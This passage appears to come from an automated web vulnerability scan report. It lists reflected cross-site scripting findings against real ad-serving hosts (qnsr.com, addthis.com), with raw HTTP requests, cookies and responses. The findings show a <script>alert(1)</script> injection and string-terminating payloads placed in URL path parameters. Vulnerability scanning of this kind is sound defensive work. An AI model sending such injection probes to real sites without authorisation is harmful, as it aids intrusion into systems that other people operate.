Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298426248.60|1297806627.66; psc=4; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 314
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 26 Feb 2011 00:20:52 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 28 Mar 2011 00:20:52 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298679652.60|1297806627.66; Domain=.addthis.com; Expires=Sun, 24-Feb-2013 18:22:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 26 Feb 2011 00:20:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Feb 2011 00:20:52 GMT
Connection: close

_ate.ad.hpre5ae4<script>alert(1)</script>e6a6ac44971({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d5af32c71c2e1a5&curl=http%3a%2f%2fwww.manta.com%2fc%2fmtl07lp%2findustrial-waste-recovery-llc"],"segments"
...[SNIP]...

3.182. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 10]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acc29'%3b0ddd73bd74d was submitted in the REST URL parameter 10. This input was echoed as acc29';0ddd73bd74d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536/0/0/203635133/203635133//0/203acc29'%3b0ddd73bd74d/8598//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2591996
Expires: Mon, 28 Mar 2011 01:49:45 GMT
Date: Sat, 26 Feb 2011 01:49:49 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536;c=203635133,203635133;i=0;n=203acc29';0ddd73bd74d;s=8598;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" o
...[SNIP]...

3.183. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 11]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88920'%3b539f91e0bd9 was submitted in the REST URL parameter 11. This input was echoed as 88920';539f91e0bd9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/859888920'%3b539f91e0bd9//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:53 GMT
Date: Sat, 26 Feb 2011 01:49:53 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536;c=203635133,203635133;i=0;n=203;s=859888920';539f91e0bd9;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" onMouseO
...[SNIP]...

3.184. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4693'%3b652b91c5004 was submitted in the REST URL parameter 4. This input was echoed as d4693';652b91c5004 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536d4693'%3b652b91c5004/0/0/203635133/203635133//0/203/8598//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:32 GMT
Date: Sat, 26 Feb 2011 01:49:32 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536d4693';652b91c5004;c=203635133,203635133;i=0;n=203;s=8598;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="win
...[SNIP]...

3.185. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c75eb'%3b9d193661b16 was submitted in the REST URL parameter 7. This input was echoed as c75eb';9d193661b16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536/0/0/203635133c75eb'%3b9d193661b16/203635133//0/203/8598//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2591982
Expires: Mon, 28 Mar 2011 01:49:22 GMT
Date: Sat, 26 Feb 2011 01:49:40 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536;c=203635133c75eb';9d193661b16,203635133;i=0;n=203;s=8598;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="window.status=\
...[SNIP]...

3.186. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48b1e'%3b09e5343efb0 was submitted in the REST URL parameter 8. This input was echoed as 48b1e';09e5343efb0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536/0/0/203635133/20363513348b1e'%3b09e5343efb0//0/203/8598//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:43 GMT
Date: Sat, 26 Feb 2011 01:49:43 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536;c=203635133,20363513348b1e';09e5343efb0;i=0;n=203;s=8598;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="window.status=\'\'; retur
...[SNIP]...

3.187. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9039'%3bec5d10b6574 was submitted in the REST URL parameter 9. This input was echoed as a9039';ec5d10b6574 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536/0/0/203635133/203635133//0a9039'%3bec5d10b6574/203/8598//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:46 GMT
Date: Sat, 26 Feb 2011 01:49:46 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536;c=203635133,203635133;i=0a9039';ec5d10b6574;n=203;s=8598;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="window.status=\'\'; return tr
...[SNIP]...

3.188. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 10]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4d7c'%3bafdedb92150 was submitted in the REST URL parameter 10. This input was echoed as f4d7c';afdedb92150 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/21248/0/0/203687986/203687986//0/203f4d7c'%3bafdedb92150/9542//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1649
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:51 GMT
Date: Sat, 26 Feb 2011 01:49:51 GMT
Connection: close


var zzADS_CHAN = '203687986';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20119051;x=21248;c=203687986,203687986;i=0;n=203f4d7c';afdedb92150;s=9542;p=20830170;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://solutions.internet.com/3851_ITILv3-default" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" onMouseOut="window
...[SNIP]...

3.189. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 11]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78b07'%3b973a986fd5 was submitted in the REST URL parameter 11. This input was echoed as 78b07';973a986fd5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/954278b07'%3b973a986fd5//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1648
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:56 GMT
Date: Sat, 26 Feb 2011 01:49:56 GMT
Connection: close


var zzADS_CHAN = '203687986';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20119051;x=21248;c=203687986,203687986;i=0;n=203;s=954278b07';973a986fd5;p=20830170;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://solutions.internet.com/3851_ITILv3-default" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" onMouseOut="window.status
...[SNIP]...

3.190. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92286'%3bdf5245fe92e was submitted in the REST URL parameter 4. This input was echoed as 92286';df5245fe92e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/2124892286'%3bdf5245fe92e/0/0/203687986/203687986//0/203/9542//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1649
Cache-Control: max-age=2591978
Expires: Mon, 28 Mar 2011 01:49:11 GMT
Date: Sat, 26 Feb 2011 01:49:33 GMT
Connection: close


